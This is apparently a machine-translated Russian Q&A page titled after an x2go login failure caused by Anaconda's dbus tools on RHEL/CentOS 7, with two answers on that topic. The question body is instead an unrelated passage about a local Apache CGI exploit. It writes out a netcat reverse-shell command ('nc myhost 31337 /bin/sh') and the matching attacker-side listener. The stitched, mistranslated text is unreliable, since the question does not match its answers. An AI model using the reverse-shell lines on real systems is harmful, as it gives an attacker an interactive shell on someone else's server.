Вопросы Теги

Добавление пути anaconda к .bashrc, запущенному на Redhat 7, нарушает вход в систему x2go

Итак, перечитав информацию об эксплойте несколько раз, я усомнился в словосочетании "локальный злоумышленник": означает ли это, что уязвимость может быть использована только из та же машина, на которой запущен уязвимый Apache? В этом случае я понимаю, что злоумышленник должен заранее иметь учетные данные действительного пользователя на машине с разрешениями на управление apache (что значительно снизит применимость атаки).

Да, вы правы. На самом деле веб-сервер является целевым сервером с этой уязвимостью, myhost - это машина злоумышленника.

Поместив двоичный файл cgipwn в каталог / cgi-bin веб-сервера и открыв http: // webserver / cgi-bin / cgipwn ? ... , злоумышленник пытается запустить nc myhost 31337 / bin / sh на веб-сервере от имени пользователя, запустившего Apache (обычно root ) .

Злоумышленник ранее запускал nc -vvv -l -p 31337 на myhost , чтобы принять соединение nc с веб-сервера . Если все пойдет хорошо, злоумышленник получит доступ к интерактивному сеансу / bin / sh , запущенному от имени стартового пользователя Apache на веб-сервере .

1
28.03.2018, 20:55
2 ответа

Ответ состоял в том, чтобы обновить до самой последней версии x2goserver на стороне сервера с помощью yum update x2goserver. Знаю-знаю, но в свое оправдание первым делом проверил наличие обновлений, но на тот момент обновлений не было.

Плохая версияx2goserver version 4.0.1.20

Хорошая версияx2goserver version 4.0.1.22

1
27.01.2020, 23:23

У меня была похожая проблема, даже при использовании последних версий x2goserver, перечисленных в последнем ответе.

Похоже, что Anaconda поставляется со своей собственной версией инструментов dbus, на которые опирается x2goserver, в частности, dbus -run -session и dbus -launch. Добавление каталога anaconda в путь приводит к тому, что x2goserver выбирает версии anaconda, а не те, которые поставляются с дистрибутивом (Centos 7.5 в моем случае ). Я предполагаю, что есть какая-то несовместимость между версиями.

Удалив утилиты dbus из каталога anaconda, я снова смог войти в систему.

2
27.01.2020, 23:23

Теги

Похожие вопросы

  • 1
    Объединить PDF-документ, но с условиями 30.06.2016
    Я делаю буклеты с расписанием автобусов для водителей каждый день, и у меня есть 4 PDF-файла: Special Instruction Sheet (Каждый день разный) Ежедневное расписание автобусов (которое всегда разное) Ежедневный отчет Bus Assistant ...
  • 4
    Преобразуйте метку времени Unix в человекочитаемый формат на AIX 16.10.2013
    Я должен преобразовать метку времени Unix (число секунд с 1970, например, 1381260225 вторник 8 октября 19:23:45 GMT 2013) в стандартный человекочитаемый формат. Я мог получить некоторые ответы путем поиска с помощью Google только их...
  • 2
    Как интерпретировать все поля 'utmpdump/var/log/utmp' 23.04.2014
    Я хотел бы контролировать, вошел в систему сессии, включайте, как они вошли в систему (физическая консоль или SSH), и сколько времени та сессия существовала для. Кажется, что utmpdump/var/log/utmp имеет ту информацию, но...
  • 0
    Как создать псевдоним, который запускает zathura с вкладками 22.06.2020
    So tabbed выводит xid при запуске. Как я могу поместить это в псевдоним динамически? Я хочу сделать что-то вроде: alias zathura = tabbed -c zathura -e ${tabbed Xid идет сюда} & disown
  • 13
    Удалите дублирующиеся записи из файла CSV 13.03.2015
    У меня есть [csv] файл с дублирующейся переизданной данной величиной т.е. те же данные, распечатанные дважды. Я попытался использовать uniq вида видом myfile.csv | uniq-u однако нет никакого изменения в myfile.csv, также я имею...
  • 0
    Проблема с Начальная конфигурация Bind9 22.05.2017
    Я новичок в использовании Bind 9. Я следил за учебным курсом в Интернете, и я не знаю, почему он не работает .... Я настроил эти файлы: named.conf.local: // // Выполните здесь любую локальную конфигурацию // // Учтите ...
  • 1
    Используя sed для файлов в нескольких каталогах 27.01.2019
    , я получаю кучу файлов в нескольких каталогах с неправильными датами в первой строке каждого файла. Я пытаюсь написать скрипт, использующий sed и цикл for. Каждый файл находится в своей собственной директории, которая ...
  • 2
    Измените некоторые файлы для добавления имени файла 27.09.2014
    У меня есть набор текста (сотни txt) в каталоге. У каждого из них есть уникальное имя файла. Я хочу вставить имя файла каждого файла в первую строку соответствующих файлов. Как я могу сделать то использование...
  • 6
    как подключить устройства к соединениям с помощью nmcli? 16.10.2015
    Установка CentOS 7 имеет два соединения и три устройства. Как я могу подключить устройство ens7 к соединительному мосту my-bridge? А как подключить устройство eth0 к коннекту my-eth1? ...
  • 2
    Как правильно создать минимальное ядро FreeBSD? 28.12.2014
    Там какой-либо надлежащий путь состоит в том, чтобы создать минимальное ядро для FreeBSD? Руководство FreeBSD имеет отсутствие информации об этом. По умолчанию каталог/boot/kernel имеет довольно большой размер - приблизительно 450 МБ. Я...